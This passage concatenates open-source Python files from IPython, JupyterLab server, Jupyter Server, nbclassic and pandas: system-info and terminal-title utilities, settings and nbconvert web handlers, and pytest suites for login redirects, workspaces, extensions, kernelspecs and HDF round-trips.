----------
pkg_path : str
path containing __init__.py for package
Returns
-------
context : dict
with named parameters of interest
"""
src, hsh = pkg_commit_hash(pkg_path)
return dict(
ipython_version=release.version,
ipython_path=pkg_path,
commit_source=src,
commit_hash=hsh,
sys_version=sys.version,
sys_executable=sys.executable,
sys_platform=sys.platform,
platform=platform.platform(),
os_name=os.name,
default_encoding=encoding.DEFAULT_ENCODING,
)
def get_sys_info():
"""Return useful information about IPython and the system, as a dict."""
p = os.path
path = p.realpath(p.dirname(p.abspath(p.join(__file__, '..'))))
return pkg_info(path)
def sys_info():
"""Return useful information about IPython and the system, as a string.
Examples
--------
::
In [2]: print(sys_info())
{'commit_hash': '144fdae', # random
'commit_source': 'repository',
'ipython_path': '/home/fperez/usr/lib/python2.6/site-packages/IPython',
'ipython_version': '0.11.dev',
'os_name': 'posix',
'platform': 'Linux-2.6.35-22-generic-i686-with-Ubuntu-10.10-maverick',
'sys_executable': '/usr/bin/python',
'sys_platform': 'linux2',
'sys_version': '2.6.6 (r266:84292, Sep 15 2010, 15:52:39) \\n[GCC 4.4.5]'}
"""
return pprint.pformat(get_sys_info())
def num_cpus():
"""DEPRECATED
Return the effective number of CPUs in the system as an integer.
This cross-platform function makes an attempt at finding the total number of
available CPUs in the system, as returned by various underlying system and
python calls.
If it can't find a sensible answer, it returns 1 (though an error *may* make
it return a large positive number that's actually incorrect).
"""
import warnings
warnings.warn(
"`num_cpus` is deprecated since IPython 8.0. Use `os.cpu_count` instead.",
DeprecationWarning,
stacklevel=2,
)
return os.cpu_count() or 1
```
#### File: IPython/utils/terminal.py
```python
import os
import sys
import warnings
from shutil import get_terminal_size as _get_terminal_size
# This variable is part of the expected API of the module:
ignore_termtitle = True
if os.name == 'posix':
def _term_clear():
os.system('clear')
elif sys.platform == 'win32':
def _term_clear():
os.system('cls')
else:
def _term_clear():
pass
def toggle_set_term_title(val):
"""Control whether set_term_title is active or not.
set_term_title() allows writing to the console titlebar. In embedded
widgets this can cause problems, so this call can be used to toggle it on
or off as needed.
The default state of the module is for the function to be disabled.
Parameters
----------
val : bool
If True, set_term_title() actually writes to the terminal (using the
appropriate platform-specific module). If False, it is a no-op.
"""
global ignore_termtitle
ignore_termtitle = not(val)
def _set_term_title(*args,**kw):
"""Dummy no-op."""
pass
def _restore_term_title():
pass
def _set_term_title_xterm(title):
""" Change virtual terminal title in xterm-workalikes """
# save the current title to the xterm "stack"
sys.stdout.write('\033[22;0t')
sys.stdout.write('\033]0;%s\007' % title)
def _restore_term_title_xterm():
sys.stdout.write('\033[23;0t')
if os.name == 'posix':
TERM = os.environ.get('TERM','')
if TERM.startswith('xterm'):
_set_term_title = _set_term_title_xterm
_restore_term_title = _restore_term_title_xterm
elif sys.platform == 'win32':
try:
import ctypes
SetConsoleTitleW = ctypes.windll.kernel32.SetConsoleTitleW
SetConsoleTitleW.argtypes = [ctypes.c_wchar_p]
def _set_term_title(title):
"""Set terminal title using ctypes to access the Win32 APIs."""
SetConsoleTitleW(title)
except ImportError:
def _set_term_title(title):
"""Set terminal title using the 'title' command."""
global ignore_termtitle
try:
# Cannot be on network share when issuing system commands
curr = os.getcwd()
os.chdir("C:")
ret = os.system("title " + title)
finally:
os.chdir(curr)
if ret:
# non-zero return code signals error, don't try again
ignore_termtitle = True
def set_term_title(title):
"""Set terminal title using the necessary platform-dependent calls."""
if ignore_termtitle:
return
_set_term_title(title)
def restore_term_title():
"""Restore, if possible, terminal title to the original state"""
if ignore_termtitle:
return
_restore_term_title()
def freeze_term_title():
warnings.warn("This function is deprecated, use toggle_set_term_title()")
global ignore_termtitle
ignore_termtitle = True
def get_terminal_size(defaultx=80, defaulty=25):
return _get_terminal_size((defaultx, defaulty))
```
#### File: utils/tests/test_sysinfo.py
```python
import json
import pytest
from IPython.utils import sysinfo
def test_json_getsysinfo():
"""
test that it is easily jsonable and don't return bytes somewhere.
"""
json.dumps(sysinfo.get_sys_info())
def test_num_cpus():
with pytest.deprecated_call():
sysinfo.num_cpus()
```
#### File: site-packages/jupyterlab_server/settings_handler.py
```python
import json
from jsonschema import ValidationError
from jupyter_server.extension.handler import (
ExtensionHandlerJinjaMixin,
ExtensionHandlerMixin,
)
from tornado import web
from .settings_utils import SchemaHandler, get_settings, save_settings
from .translation_utils import DEFAULT_LOCALE, translator
class SettingsHandler(ExtensionHandlerMixin, ExtensionHandlerJinjaMixin, SchemaHandler):
def initialize(
self,
name,
app_settings_dir,
schemas_dir,
settings_dir,
labextensions_path,
**kwargs
):
SchemaHandler.initialize(
self, app_settings_dir, schemas_dir, settings_dir, labextensions_path
)
ExtensionHandlerMixin.initialize(self, name)
@web.authenticated
def get(self, schema_name=""):
"""Get setting(s)"""
# Need to be update here as translator locale is not change when a new locale is put
# from frontend
locale = self.get_current_locale()
translator.set_locale(locale)
result, warnings = get_settings(
self.app_settings_dir,
self.schemas_dir,
self.settings_dir,
labextensions_path=self.labextensions_path,
schema_name=schema_name,
overrides=self.overrides,
translator=translator.translate_schema
)
# Print all warnings.
for w in warnings:
if w:
self.log.warn(w)
return self.finish(json.dumps(result))
@web.authenticated
def put(self, schema_name):
"""Update a setting"""
overrides = self.overrides
schemas_dir = self.schemas_dir
settings_dir = self.settings_dir
settings_error = 'No current settings directory'
invalid_json_error = 'Failed parsing JSON payload: %s'
invalid_payload_format_error = 'Invalid format for JSON payload. Must be in the form {\'raw\': ...}'
validation_error = 'Failed validating input: %s'
if not settings_dir:
raise web.HTTPError(500, settings_error)
raw_payload = self.request.body.strip().decode('utf-8')
try:
raw_settings = json.loads(raw_payload)["raw"]
save_settings(
schemas_dir,
settings_dir,
schema_name,
raw_settings,
overrides,
self.labextensions_path,
)
except json.decoder.JSONDecodeError as e:
raise web.HTTPError(400, invalid_json_error % str(e))
except (KeyError, TypeError) as e:
raise web.HTTPError(400, invalid_payload_format_error)
except ValidationError as e:
raise web.HTTPError(400, validation_error % str(e))
self.set_status(204)
```
#### File: jupyterlab_server/tests/test_workspaces_api.py
```python
import json
import os
import pytest
import shutil
import tornado
from strict_rfc3339 import rfc3339_to_timestamp
from .utils import expected_http_error, maybe_patch_ioloop, big_unicode_string
from .utils import validate_request
maybe_patch_ioloop()
async def test_delete(jp_fetch, labserverapp):
orig = 'f/o/o'
copy = 'baz'
r = await jp_fetch('lab', 'api', 'workspaces', orig)
validate_request(r)
res = r.body.decode()
data = json.loads(res)
data['metadata']['id'] = copy
r2 = await jp_fetch('lab', 'api', 'workspaces', copy,
method='PUT',
body=json.dumps(data))
assert r2.code == 204
r3 = await jp_fetch('lab', 'api', 'workspaces', copy,
method='DELETE',
)
assert r3.code == 204
async def test_get_non_existant(jp_fetch, labserverapp):
id = 'foo'
r = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r)
data = json.loads(r.body.decode())
r2 = await jp_fetch('lab', 'api', 'workspaces', id,
method='PUT',
body=json.dumps(data))
validate_request(r2)
r3 = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r3)
data = json.loads(r3.body.decode())
first_metadata = data["metadata"]
first_created = rfc3339_to_timestamp(first_metadata['created'])
first_modified = rfc3339_to_timestamp(first_metadata['last_modified'])
r4 = await jp_fetch('lab', 'api', 'workspaces', id,
method='PUT',
body=json.dumps(data))
validate_request(r4)
r5 = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r5)
data = json.loads(r5.body.decode())
second_metadata = data["metadata"]
second_created = rfc3339_to_timestamp(second_metadata['created'])
second_modified = rfc3339_to_timestamp(second_metadata['last_modified'])
assert first_created <= second_created
assert first_modified < second_modified
@pytest.mark.skipif(os.name == "nt", reason="Temporal failure on windows")
async def test_get(jp_fetch, labserverapp):
id = 'foo'
r = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r)
data = json.loads(r.body.decode())
metadata = data['metadata']
assert metadata['id'] == id
assert rfc3339_to_timestamp(metadata['created'])
assert rfc3339_to_timestamp(metadata['last_modified'])
r2 = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r2)
data = json.loads(r.body.decode())
assert data['metadata']['id'] == id
async def test_listing(jp_fetch, labserverapp):
# ID fields are from workspaces/*.jupyterlab-workspace
listing = set(['foo', 'f/o/o/'])
r = await jp_fetch('lab', 'api', 'workspaces/')
validate_request(r)
res = r.body.decode()
data = json.loads(res)
output = set(data['workspaces']['ids'])
assert output == listing
async def test_listing_dates(jp_fetch, labserverapp):
r = await jp_fetch('lab', 'api', 'workspaces')
data = json.loads(r.body.decode())
values = data['workspaces']['values']
times = sum(
[
[ws['metadata'].get('last_modified'), ws['metadata'].get('created')]
for ws in values
],
[]
)
assert None not in times
[rfc3339_to_timestamp(t) for t in times]
async def test_put(jp_fetch, labserverapp):
id = 'foo'
r = await jp_fetch('lab', 'api', 'workspaces', id)
assert r.code == 200
res = r.body.decode()
data = json.loads(res)
data["metadata"]["big-unicode-string"] = big_unicode_string[::-1]
r2 = await jp_fetch('lab', 'api', 'workspaces', id,
method='PUT',
body=json.dumps(data)
)
assert r2.code == 204
async def test_bad_put(jp_fetch, labserverapp):
orig = 'foo'
copy = 'bar'
r = await jp_fetch('lab', 'api', 'workspaces', orig)
assert r.code == 200
res = r.body.decode()
data = json.loads(res)
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch('lab', 'api', 'workspaces', copy,
method='PUT',
body=json.dumps(data)
)
assert expected_http_error(e, 400)
async def test_blank_put(jp_fetch, labserverapp):
orig = 'foo'
r = await jp_fetch('lab', 'api', 'workspaces', orig)
assert r.code == 200
res = r.body.decode()
data = json.loads(res)
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch('lab', 'api', 'workspaces',
method='PUT',
body=json.dumps(data)
)
assert expected_http_error(e, 400)
```
#### File: jupyter_server/nbconvert/handlers.py
```python
import io
import os
import zipfile
from anyio.to_thread import run_sync
from ipython_genutils import text
from ipython_genutils.py3compat import cast_bytes
from nbformat import from_dict
from tornado import web
from tornado.log import app_log
from ..base.handlers import FilesRedirectHandler
from ..base.handlers import JupyterHandler
from ..base.handlers import path_regex
from jupyter_server.utils import ensure_async
def find_resource_files(output_files_dir):
files = []
for dirpath, dirnames, filenames in os.walk(output_files_dir):
files.extend([os.path.join(dirpath, f) for f in filenames])
return files
def respond_zip(handler, name, output, resources):
"""Zip up the output and resource files and respond with the zip file.
Returns True if it has served a zip file, False if there are no resource
files, in which case we serve the plain output file.
"""
# Check if we have resource files we need to zip
output_files = resources.get("outputs", None)
if not output_files:
return False
# Headers
zip_filename = os.path.splitext(name)[0] + ".zip"
handler.set_attachment_header(zip_filename)
handler.set_header("Content-Type", "application/zip")
handler.set_header("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0")
# Prepare the zip file
buffer = io.BytesIO()
zipf = zipfile.ZipFile(buffer, mode="w", compression=zipfile.ZIP_DEFLATED)
output_filename = os.path.splitext(name)[0] + resources["output_extension"]
zipf.writestr(output_filename, cast_bytes(output, "utf-8"))
for filename, data in output_files.items():
zipf.writestr(os.path.basename(filename), data)
zipf.close()
handler.finish(buffer.getvalue())
return True
def get_exporter(format, **kwargs):
"""get an exporter, raising appropriate errors"""
# if this fails, will raise 500
try:
from nbconvert.exporters.base import get_exporter
except ImportError as e:
raise web.HTTPError(500, "Could not import nbconvert: %s" % e) from e
try:
Exporter = get_exporter(format)
except KeyError as e:
# should this be 400?
raise web.HTTPError(404, u"No exporter for format: %s" % format) from e
try:
return Exporter(**kwargs)
except Exception as e:
app_log.exception("Could not construct Exporter: %s", Exporter)
raise web.HTTPError(500, "Could not construct Exporter: %s" % e) from e
class NbconvertFileHandler(JupyterHandler):
SUPPORTED_METHODS = ("GET",)
@web.authenticated
async def get(self, format, path):
self.check_xsrf_cookie()
exporter = get_exporter(format, config=self.config, log=self.log)
path = path.strip("/")
# If the notebook relates to a real file (default contents manager),
# give its path to nbconvert.
if hasattr(self.contents_manager, "_get_os_path"):
os_path = self.contents_manager._get_os_path(path)
ext_resources_dir, basename = os.path.split(os_path)
else:
ext_resources_dir = None
model = await ensure_async(self.contents_manager.get(path=path))
name = model["name"]
if model["type"] != "notebook":
# not a notebook, redirect to files
return FilesRedirectHandler.redirect_to_files(self, path)
nb = model["content"]
self.set_header("Last-Modified", model["last_modified"])
# create resources dictionary
mod_date = model["last_modified"].strftime(text.date_format)
nb_title = os.path.splitext(name)[0]
resource_dict = {
"metadata": {"name": nb_title, "modified_date": mod_date},
"config_dir": self.application.settings["config_dir"],
}
if ext_resources_dir:
resource_dict["metadata"]["path"] = ext_resources_dir
# Exporting can take a while, delegate to a thread so we don't block the event loop
try:
output, resources = await run_sync(
lambda: exporter.from_notebook_node(nb, resources=resource_dict)
)
except Exception as e:
self.log.exception("nbconvert failed: %s", e)
raise web.HTTPError(500, "nbconvert failed: %s" % e) from e
if respond_zip(self, name, output, resources):
return
# Force download if requested
if self.get_argument("download", "false").lower() == "true":
filename = os.path.splitext(name)[0] + resources["output_extension"]
self.set_attachment_header(filename)
# MIME type
if exporter.output_mimetype:
self.set_header("Content-Type", "%s; charset=utf-8" % exporter.output_mimetype)
self.set_header("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0")
self.finish(output)
class NbconvertPostHandler(JupyterHandler):
SUPPORTED_METHODS = ("POST",)
@web.authenticated
async def post(self, format):
exporter = get_exporter(format, config=self.config)
model = self.get_json_body()
name = model.get("name", "notebook.ipynb")
nbnode = from_dict(model["content"])
try:
output, resources = await run_sync(
lambda: exporter.from_notebook_node(
nbnode,
resources={
"metadata": {"name": name[: name.rfind(".")]},
"config_dir": self.application.settings["config_dir"],
},
)
)
except Exception as e:
raise web.HTTPError(500, "nbconvert failed: %s" % e) from e
if respond_zip(self, name, output, resources):
return
# MIME type
if exporter.output_mimetype:
self.set_header("Content-Type", "%s; charset=utf-8" % exporter.output_mimetype)
self.finish(output)
# -----------------------------------------------------------------------------
# URL to handler mappings
# -----------------------------------------------------------------------------
_format_regex = r"(?P<format>\w+)"
default_handlers = [
(r"/nbconvert/%s" % _format_regex, NbconvertPostHandler),
(r"/nbconvert/%s%s" % (_format_regex, path_regex), NbconvertFileHandler),
]
```
#### File: services/security/handlers.py
```python
from tornado import web
from . import csp_report_uri
from ...base.handlers import APIHandler
class CSPReportHandler(APIHandler):
"""Accepts a content security policy violation report"""
_track_activity = False
def skip_check_origin(self):
"""Don't check origin when reporting origin-check violations!"""
return True
def check_xsrf_cookie(self):
# don't check XSRF for CSP reports
return
@web.authenticated
def post(self):
"""Log a content security policy violation report"""
self.log.warning(
"Content security violation: %s", self.request.body.decode("utf8", "replace")
)
default_handlers = [(csp_report_uri, CSPReportHandler)]
```
#### File: tests/auth/test_login.py
```python
from functools import partial
from urllib.parse import urlencode
import pytest
from tornado.httpclient import HTTPClientError
from tornado.httputil import parse_cookie
from tornado.httputil import url_concat
from jupyter_server.utils import url_path_join
# override default config to ensure a non-empty base url is used
@pytest.fixture
def jp_base_url():
return "/a%40b/"
@pytest.fixture
def jp_server_config(jp_base_url):
return {
"ServerApp": {
"base_url": jp_base_url,
},
}
async def _login(jp_serverapp, http_server_client, jp_base_url, next):
# first: request login page with no creds
login_url = url_path_join(jp_base_url, "login")
first = await http_server_client.fetch(login_url)
cookie_header = first.headers["Set-Cookie"]
cookies = parse_cookie(cookie_header)
# second, submit login form with credentials
try:
resp = await http_server_client.fetch(
url_concat(login_url, {"next": next}),
method="POST",
body=urlencode(
{
"password": <PASSWORD>,
"_xsrf": cookies.get("_xsrf", ""),
}
),
headers={"Cookie": cookie_header},
follow_redirects=False,
)
except HTTPClientError as e:
if e.code != 302:
raise
return e.response.headers["Location"]
else:
assert resp.code == 302, "Should have returned a redirect!"
@pytest.fixture
def login(jp_serverapp, http_server_client, jp_base_url):
"""Fixture to return a function to login to a Jupyter server
by submitting the login page form
"""
yield partial(_login, jp_serverapp, http_server_client, jp_base_url)
@pytest.mark.parametrize(
"bad_next",
(
r"\\tree",
"//some-host",
"//host{base_url}tree",
"https://google.com",
"/absolute/not/base_url",
),
)
async def test_next_bad(login, jp_base_url, bad_next):
bad_next = bad_next.format(base_url=jp_base_url)
url = await login(bad_next)
assert url == jp_base_url
@pytest.mark.parametrize(
"next_path",
(
"tree/",
"//{base_url}tree",
"notebooks/notebook.ipynb",
"tree//something",
),
)
async def test_next_ok(login, jp_base_url, next_path):
next_path = next_path.format(base_url=jp_base_url)
expected = jp_base_url + next_path
actual = await login(next=expected)
assert actual == expected
```
#### File: tests/extension/test_config.py
```python
import pytest
from jupyter_core.paths import jupyter_config_path
from jupyter_server.extension.config import (
ExtensionConfigManager,
)
# Use ServerApps environment because it monkeypatches
# jupyter_core.paths and provides a config directory
# that's not cross contaminating the user config directory.
pytestmark = pytest.mark.usefixtures("jp_environ")
@pytest.fixture
def configd(jp_env_config_path):
"""A pathlib.Path object that acts like a jupyter_server_config.d folder."""
configd = jp_env_config_path.joinpath("jupyter_server_config.d")
configd.mkdir()
return configd
ext1_json_config = """\
{
"ServerApp": {
"jpserver_extensions": {
"ext1_config": true
}
}
}
"""
@pytest.fixture
def ext1_config(configd):
config = configd.joinpath("ext1_config.json")
config.write_text(ext1_json_config)
ext2_json_config = """\
{
"ServerApp": {
"jpserver_extensions": {
"ext2_config": false
}
}
}
"""
@pytest.fixture
def ext2_config(configd):
config = configd.joinpath("ext2_config.json")
config.write_text(ext2_json_config)
def test_list_extension_from_configd(ext1_config, ext2_config):
manager = ExtensionConfigManager(read_config_path=jupyter_config_path())
extensions = manager.get_jpserver_extensions()
assert "ext2_config" in extensions
assert "ext1_config" in extensions
```
#### File: tests/extension/test_manager.py
```python
import os
import unittest.mock as mock
import pytest
from jupyter_core.paths import jupyter_config_path
from jupyter_server.extension.manager import ExtensionManager
from jupyter_server.extension.manager import ExtensionMetadataError
from jupyter_server.extension.manager import ExtensionModuleNotFound
from jupyter_server.extension.manager import ExtensionPackage
from jupyter_server.extension.manager import ExtensionPoint
# Use ServerApps environment because it monkeypatches
# jupyter_core.paths and provides a config directory
# that's not cross contaminating the user config directory.
pytestmark = pytest.mark.usefixtures("jp_environ")
def test_extension_point_api():
# Import mock extension metadata
from .mockextensions import _jupyter_server_extension_points
# Testing the first path (which is an extension app).
metadata_list = _jupyter_server_extension_points()
point = metadata_list[0]
module = point["module"]
app = point["app"]
e = ExtensionPoint(metadata=point)
assert e.module_name == module
assert e.name == app.name
assert app is not None
assert callable(e.load)
assert callable(e.link)
assert e.validate()
def test_extension_point_metadata_error():
# Missing the "module" key.
bad_metadata = {"name": "nonexistent"}
with pytest.raises(ExtensionMetadataError):
ExtensionPoint(metadata=bad_metadata)
def test_extension_point_notfound_error():
bad_metadata = {"module": "nonexistent"}
with pytest.raises(ExtensionModuleNotFound):
ExtensionPoint(metadata=bad_metadata)
def test_extension_package_api():
# Import mock extension metadata
from .mockextensions import _jupyter_server_extension_points
# Testing the first path (which is an extension app).
metadata_list = _jupyter_server_extension_points()
path1 = metadata_list[0]
app = path1["app"]
e = ExtensionPackage(name="jupyter_server.tests.extension.mockextensions")
e.extension_points
assert hasattr(e, "extension_points")
assert len(e.extension_points) == len(metadata_list)
assert app.name in e.extension_points
assert e.validate()
def test_extension_package_notfound_error():
with pytest.raises(ExtensionModuleNotFound):
ExtensionPackage(name="nonexistent")
def _normalize_path(path_list):
return [p.rstrip(os.path.sep) for p in path_list]
def test_extension_manager_api(jp_serverapp):
jpserver_extensions = {"jupyter_server.tests.extension.mockextensions": True}
manager = ExtensionManager(serverapp=jp_serverapp)
assert manager.config_manager
expected = _normalize_path(os.path.join(jupyter_config_path()[0], "serverconfig"))
assert _normalize_path(manager.config_manager.read_config_path[0]) == expected
manager.from_jpserver_extensions(jpserver_extensions)
assert len(manager.extensions) == 1
assert "jupyter_server.tests.extension.mockextensions" in manager.extensions
def test_extension_manager_linked_extensions(jp_serverapp):
name = "jupyter_server.tests.extension.mockextensions"
manager = ExtensionManager(serverapp=jp_serverapp)
manager.add_extension(name, enabled=True)
manager.link_extension(name)
assert name in manager.linked_extensions
def test_extension_manager_fail_add(jp_serverapp):
name = "jupyter_server.tests.extension.notanextension"
manager = ExtensionManager(serverapp=jp_serverapp)
manager.add_extension(name, enabled=True) # should only warn
jp_serverapp.reraise_server_extension_failures = True
with pytest.raises(ExtensionModuleNotFound):
manager.add_extension(name, enabled=True)
def test_extension_manager_fail_link(jp_serverapp):
name = "jupyter_server.tests.extension.mockextensions.app"
with mock.patch(
"jupyter_server.tests.extension.mockextensions.app.MockExtensionApp.parse_command_line",
side_effect=RuntimeError,
):
manager = ExtensionManager(serverapp=jp_serverapp)
manager.add_extension(name, enabled=True)
manager.link_extension(name) # should only warn
jp_serverapp.reraise_server_extension_failures = True
with pytest.raises(RuntimeError):
manager.link_extension(name)
def test_extension_manager_fail_load(jp_serverapp):
name = "jupyter_server.tests.extension.mockextensions.app"
with mock.patch(
"jupyter_server.tests.extension.mockextensions.app.MockExtensionApp.initialize_handlers",
side_effect=RuntimeError,
):
manager = ExtensionManager(serverapp=jp_serverapp)
manager.add_extension(name, enabled=True)
manager.link_extension(name)
manager.load_extension(name) # should only warn
jp_serverapp.reraise_server_extension_failures = True
with pytest.raises(RuntimeError):
manager.load_extension(name)
```
#### File: tests/nbconvert/test_handlers.py
```python
import json
from base64 import encodebytes
from shutil import which
import pytest
import tornado
from nbformat import writes
from nbformat.v4 import new_code_cell
from nbformat.v4 import new_markdown_cell
from nbformat.v4 import new_notebook
from nbformat.v4 import new_output
from ..utils import expected_http_error
png_green_pixel = encodebytes(
b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00"
b"\x00\x00\x01\x00\x00x00\x01\x08\x02\x00\x00\x00\x90wS\xde\x00\x00\x00\x0cIDAT"
b"\x08\xd7c\x90\xfb\xcf\x00\x00\x02\\\x01\x1e.~d\x87\x00\x00\x00\x00IEND\xaeB`\x82"
).decode("ascii")
@pytest.fixture
def notebook(jp_root_dir):
# Build sub directory.
subdir = jp_root_dir / "foo"
if not jp_root_dir.joinpath("foo").is_dir():
subdir.mkdir()
# Build a notebook programmatically.
nb = new_notebook()
nb.cells.append(new_markdown_cell(u"Created by test ³"))
cc1 = new_code_cell(source=u"print(2*6)")
cc1.outputs.append(new_output(output_type="stream", text=u"12"))
cc1.outputs.append(
new_output(
output_type="execute_result",
data={"image/png": png_green_pixel},
execution_count=1,
)
)
nb.cells.append(cc1)
# Write file to tmp dir.
nbfile = subdir / "testnb.ipynb"
nbfile.write_text(writes(nb, version=4), encoding="utf-8")
pytestmark = pytest.mark.skipif(not which("pandoc"), reason="Command 'pandoc' is not available")
async def test_from_file(jp_fetch, notebook):
r = await jp_fetch(
"nbconvert", "html", "foo", "testnb.ipynb", method="GET", params={"download": False}
)
assert r.code == 200
assert "text/html" in r.headers["Content-Type"]
assert "Created by test" in r.body.decode()
assert "print" in r.body.decode()
r = await jp_fetch(
"nbconvert", "python", "foo", "testnb.ipynb", method="GET", params={"download": False}
)
assert r.code == 200
assert "text/x-python" in r.headers["Content-Type"]
assert "print(2*6)" in r.body.decode()
async def test_from_file_404(jp_fetch, notebook):
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch(
"nbconvert",
"html",
"foo",
"thisdoesntexist.ipynb",
method="GET",
params={"download": False},
)
assert expected_http_error(e, 404)
async def test_from_file_download(jp_fetch, notebook):
r = await jp_fetch(
"nbconvert", "python", "foo", "testnb.ipynb", method="GET", params={"download": True}
)
content_disposition = r.headers["Content-Disposition"]
assert "attachment" in content_disposition
assert "testnb.py" in content_disposition
async def test_from_file_zip(jp_fetch, notebook):
r = await jp_fetch(
"nbconvert", "latex", "foo", "testnb.ipynb", method="GET", params={"download": True}
)
assert "application/zip" in r.headers["Content-Type"]
assert ".zip" in r.headers["Content-Disposition"]
async def test_from_post(jp_fetch, notebook):
r = await jp_fetch(
"api/contents/foo/testnb.ipynb",
method="GET",
)
nbmodel = json.loads(r.body.decode())
r = await jp_fetch("nbconvert", "html", method="POST", body=json.dumps(nbmodel))
assert r.code == 200
assert "text/html" in r.headers["Content-Type"]
assert "Created by test" in r.body.decode()
assert "print" in r.body.decode()
r = await jp_fetch("nbconvert", "python", method="POST", body=json.dumps(nbmodel))
assert r.code == 200
assert u"text/x-python" in r.headers["Content-Type"]
assert "print(2*6)" in r.body.decode()
async def test_from_post_zip(jp_fetch, notebook):
r = await jp_fetch(
"api/contents/foo/testnb.ipynb",
method="GET",
)
nbmodel = json.loads(r.body.decode())
r = await jp_fetch("nbconvert", "latex", method="POST", body=json.dumps(nbmodel))
assert "application/zip" in r.headers["Content-Type"]
assert ".zip" in r.headers["Content-Disposition"]
```
#### File: services/kernelspecs/test_api.py
```python
import json
import pytest
import tornado
from jupyter_client.kernelspec import NATIVE_KERNEL_NAME
from ...utils import expected_http_error
from ...utils import some_resource
async def test_list_kernelspecs_bad(jp_fetch, jp_kernelspecs, jp_data_dir):
bad_kernel_dir = jp_data_dir.joinpath(jp_data_dir, "kernels", "bad2")
bad_kernel_dir.mkdir(parents=True)
bad_kernel_json = bad_kernel_dir.joinpath("kernel.json")
bad_kernel_json.write_text("garbage")
r = await jp_fetch("api", "kernelspecs", method="GET")
model = json.loads(r.body.decode())
assert isinstance(model, dict)
assert model["default"] == NATIVE_KERNEL_NAME
specs = model["kernelspecs"]
assert isinstance(specs, dict)
assert len(specs) > 2
async def test_list_kernelspecs(jp_fetch, jp_kernelspecs):
r = await jp_fetch("api", "kernelspecs", method="GET")
model = json.loads(r.body.decode())
assert isinstance(model, dict)
assert model["default"] == NATIVE_KERNEL_NAME
specs = model["kernelspecs"]
assert isinstance(specs, dict)
assert len(specs) > 2
def is_sample_kernelspec(s):
return s["name"] == "sample" and s["spec"]["display_name"] == "Test kernel"
def is_default_kernelspec(s):
return s["name"] == NATIVE_KERNEL_NAME and s["spec"]["display_name"].startswith("Python")
assert any(is_sample_kernelspec(s) for s in specs.values()), specs
assert any(is_default_kernelspec(s) for s in specs.values()), specs
async def test_get_kernelspecs(jp_fetch, jp_kernelspecs):
r = await jp_fetch("api", "kernelspecs", "Sample", method="GET")
model = json.loads(r.body.decode())
assert model["name"].lower() == "sample"
assert isinstance(model["spec"], dict)
assert model["spec"]["display_name"] == "Test kernel"
assert isinstance(model["resources"], dict)
async def test_get_kernelspec_spaces(jp_fetch, jp_kernelspecs):
r = await jp_fetch("api", "kernelspecs", "sample%202", method="GET")
model = json.loads(r.body.decode())
assert model["name"].lower() == "sample 2"
async def test_get_nonexistant_kernelspec(jp_fetch, jp_kernelspecs):
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch("api", "kernelspecs", "nonexistant", method="GET")
assert expected_http_error(e, 404)
async def test_get_kernel_resource_file(jp_fetch, jp_kernelspecs):
r = await jp_fetch("kernelspecs", "sAmple", "resource.txt", method="GET")
res = r.body.decode("utf-8")
assert res == some_resource
async def test_get_nonexistant_resource(jp_fetch, jp_kernelspecs):
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch("kernelspecs", "nonexistant", "resource.txt", method="GET")
assert expected_http_error(e, 404)
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch("kernelspecs", "sample", "nonexistant.txt", method="GET")
assert expected_http_error(e, 404)
```
#### File: nbclassic/tests/test_nbserver.py
```python
import pytest
def test_classic_notebook_templates(jp_serverapp):
classic_notebook_templates = [
"notebook.html",
"tree.html"
]
# Get the server's template environment.
template_env = jp_serverapp.web_app.settings.get("notebook_jinja2_env")
for name in classic_notebook_templates:
template_env.get_template(name)
async def test_classic_notebook_asset_URLS(jp_fetch):
classic_notebook_paths = [
# Some classic notebook asset paths
'/static/notebook/js/main.js',
'/static/services/contents.js',
# NBclassic asset paths work too.
'/static/notebook/notebook/js/main.js',
'/static/notebook/services/contents.js',
]
for url_path in classic_notebook_paths:
r = await jp_fetch(url_path)
assert r.code == 200
```
#### File: io/pytables/test_round_trip.py
```python
import datetime
import re
from warnings import (
catch_warnings,
simplefilter,
)
import numpy as np
import pytest
from pandas._libs.tslibs import Timestamp
from pandas.compat import is_platform_windows
import pandas as pd
from pandas import (
DataFrame,
Index,
Series,
_testing as tm,
bdate_range,
read_hdf,
)
from pandas.tests.io.pytables.common import (
_maybe_remove,
ensure_clean_path,
ensure_clean_store,
)
from pandas.util import _test_decorators as td
_default_compressor = "blosc"
pytestmark = pytest.mark.single
def test_conv_read_write(setup_path):
with tm.ensure_clean() as path:
def roundtrip(key, obj, **kwargs):
obj.to_hdf(path, key, **kwargs)
return read_hdf(path, key)
o = tm.makeTimeSeries()
tm.assert_series_equal(o, roundtrip("series", o))
o = tm.makeStringSeries()
tm.assert_series_equal(o, roundtrip("string_series", o))
o = tm.makeDataFrame()
tm.assert_frame_equal(o, roundtrip("frame", o))
# table
df = DataFrame({"A": range(5), "B": range(5)})
df.to_hdf(path, "table", append=True)
result = read_hdf(path, "table", where=["index>2"])
tm.assert_frame_equal(df[df.index > 2], result)
def test_long_strings(setup_path):
# GH6166
df = DataFrame(
{"a": tm.rands_array(100, size=10)}, index=tm.rands_array(100, size=10)
)
with ensure_clean_store(setup_path) as store:
store.append("df", df, data_columns=["a"])
result = store.select("df")
tm.assert_frame_equal(df, result)
def test_api(setup_path):
# GH4584
# API issue when to_hdf doesn't accept append AND format args
with ensure_clean_path(setup_path) as path:
df = tm.makeDataFrame()
df.iloc[:10].to_hdf(path, "df", append=True, format="table")
df.iloc[10:].to_hdf(path, "df", append=True, format="table")
tm.assert_frame_equal(read_hdf(path, "df"), df)
# append to False
df.iloc[:10].to_hdf(path, "df", append=False, format="table")
df.iloc[10:].to_hdf(path, "df", append=True, format="table")
tm.assert_frame_equal(read_hdf(path, "df"), df)
with ensure_clean_path(setup_path) as path:
